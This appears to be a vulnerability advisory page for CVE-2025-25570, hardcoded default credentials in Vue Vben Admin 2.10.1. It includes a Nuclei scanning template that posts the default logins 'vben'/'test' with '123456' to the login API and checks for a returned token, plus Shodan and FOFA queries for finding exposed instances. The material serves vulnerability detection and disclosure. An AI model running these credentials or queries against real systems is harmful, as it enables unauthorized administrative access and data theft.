漏洞描述
Vue Vben Admin 2.10.1 contains a broken authentication caused by hardcoded credentials in the backend, letting attackers log in without proper authorization, exploit requires access to the login interface.
CVE-2025-25570: Vue Vben Admin - Default Credentials
PoC代码[已公开]
id: CVE-2025-25570
info:
name: Vue Vben Admin - Default Credentials
author: 0x_Akoko
severity: critical
description: |
Vue Vben Admin 2.10.1 contains a broken authentication caused by hardcoded credentials in the backend, letting attackers log in without proper authorization, exploit requires access to the login interface.
impact: |
Attackers can gain unauthorized access to the backend, potentially leading to data theft or system control
remediation: |
Remove hardcoded credentials and implement proper authentication mechanisms, update to the latest version if available.
reference:
- https://github.com/vbenjs/vue-vben-admin
- https://doc.vvbin.cn/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-25570
epss-score: 0.47326
epss-percentile: 0.97589
cwe-id: CWE-798
metadata:
verified: true
max-request: 2
shodan-query: http.html:"vben" || http.html:"vue-vben-admin"
fofa-query: body="vben" || body="vue-vben-admin"
tags: cve,cve2025,vben,vue,default-login,credentials
http:
- raw:
- |
POST {{BaseURL}}/basic-api/login HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"username":"{{username}}","password":"{{password}}"}
attack: clusterbomb
payloads:
username:
- "vben"
- "test"
password:
- "123456"
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains_all(body, "\"code\":0", "\"type\":\"success\"", "\"result\":", "\"token\":")'
- 'contains_any(body, "Vben Admin", "Super Admin")'
condition: and
# digest: 490a00463044022019668f4dfc21ebcb7a425b85f2a19604b388575de192b2755e1181f8859fa55302203d622f36dc6747b25c50703a7c913c8e1854872a1c1e0e1aadc3c6497621aa03:922c64590222798bb761d5b6d8e72950